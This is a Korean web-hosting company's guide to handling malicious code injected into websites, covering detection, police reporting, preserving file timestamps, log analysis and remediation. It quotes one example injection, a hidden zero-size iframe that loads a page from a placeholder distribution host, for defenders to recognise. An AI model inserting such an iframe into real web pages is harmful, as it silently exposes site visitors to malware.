Home | Data Center | Contact US | Login







1. 악성코드 확인
페이지 소스, 자바스크립트, css 파일 등에 악성코드(iframe 악용 등)가 삽입된것을 발견, 또는 외부로부터의 신고 및 통보 등을 통해 인지
정확한 악성코드의 위치를 찾지 못했다면 ARP Spoofing 에 의한 것인지, 외부 참조페이지(외부로부터 제공받는 광고, 이벤트페이지, 뉴스 등)에 삽입된 것인지 확인

2-1. 분석을 시작하기 전에 경찰 수사가 필요 없는 경우
해당 악성코드로 인한 피해가 발생했을 경우, 방문자(고객, 회원 등) 공지 계획을 수립하고 필요에 따라 유관기간에 신고. 삽입 코드로 인한 심각성, 피해확산 여부와 해당 시스템의 상황을 고려하여 서비스 중지 여부 결정

2-2. 분석을 시작하기 전에 경찰 수사가 필요한 경우
사안에 따라 사법기관의 수사가 필요한 경우엔 경찰 사이버테러대응센터에 신고
사법기관의 수사가 진행 될 경우, 증거의 무결성/완전성 확보를 위해 rebooting, 전원 off 를 포함한 모든 조치는 해당 기관의 안내에 따라야 한다.

3. 본격적인 분석 시작
악성 코드가 삽입된 파일을 모두 찾았다면 MAC time 을 포함한 속성정보를 기록/보존하여 차후 분석을 위한 단서로 활용
시스템 정보 및 각종 로그를 확보하여 코드를 삽입한 경위와 침입자 행위 분석
파악된 사고 원인을 상세히 분석하고 추가 피해 여부 등을 조사

4. 보완 조치 및 서비스 재개
보안코딩, 취약점 제거, 보안 업데이트 등의 조치를 취한 후 서비스 재개
“원인을 찾아서 제거하지 않고 단순히 OS 만 재설치 하게 되면, 사고의 원인도 함께 재설치 됩니다.!”

웹보안 4종 가이드 중 “웹 서버 구축 보안점검 가이드” 참조
http://nextline.net/?inc=support&html=pds_view&no=238&name=윈도우즈&home=



공격자가 삽입하는 악성 코드는 일반적으로 아래의 형태와 유사합니다.
<iframe src='http://유포지주소/hack.htm' width=0, height=0, frameborder=0>

만약 악성코드를 찾지 못했다면 관리자가 알아보기 어렵게 인코딩한 경우도 많으므로 아래의 그림과 문서를 참고하여 확인 해 보시기 바랍니다.

escape 기능으로 인코딩한 스크립트
별도 함수를 혼용하여 인코딩한 스크립트

윈도우즈의 경우 ‘findstr’ 명령어를 이용해 웹 소스코드 내의 문자열을 검색하십시요.
예) c:\>findstr /S “찾을 문자열” c:\inetpub\wwwroot\*.



MAC time 이란 수정(Modify), 접근(Access), 생성(Create) 시간을 뜻하며, 이 정보를 통해 악성코드가 삽입된 시간(M time), 악성 프로그램이 언제 다운로드 되었는지(C time), 언제 이 파일들을 조작 하였는지(A time) 등을 알 수 있습니다.

시스템 정보 수집을 위해선 OS 별로 시스템 로그, 웹 로그, 이벤트 로그, 보안 로그, DB 테이블 정보 등을 MAC time 에서 확보한 일시를 기준으로 집중 조사하셔야 합니다.

유닉스 계열의 경우 find 명령의 mtime 또는 ls 명령 활용

Find 용례: $ find /웹홈디렉토리 -mtime -3 -print // 3일 이내에 수정된 파일 검색

ls 용례: $ ls -Ralt --full-time                              // mtime 기준으로 정렬해서 출력

윈도우즈 계열의 경우 해당 파일의 속성(등록정보) 조회

(그림) 윈도우즈 파일의 MAC time 정보


OS 및 어플리케이션 계정, DB 계정 및 테이블 등을 조사하여 침입자가 생성한 것들이 남아 있는지 반드시 확인해야 합니다. 추후 취약한 소스의 보안 코딩, 윈도우즈 및 OS 커널 등의 업데이트, 웹 방화벽 등을 설치하여 보완 조치 하셔야 합니다. 서비스를 재개한 뒤에도 일정기간 모니터링 하며 재발 여부 확인이 필요합니다.



악성코드 탐지 서비스 도입전, 본사 영업팀과의 상담을 통하여 본서비스에 대한 소개 및 기본적인 정보를
   제공받으실 수 있습니다.
☎ 전화 : 1544-5455 (내선 1)   









회사소개 개인정보취급방침 이용약관 이메일주소 무단수집거부 CONTACT US IDC 약도
회사소개 개인정보취급방침 이용약관 이메일주소 무단수집거부 CONTACT US IDC 약도 회사소개 개인정보취급방침 이용약관 이메일주소 무단수집거부 CONTACT US IDC 약도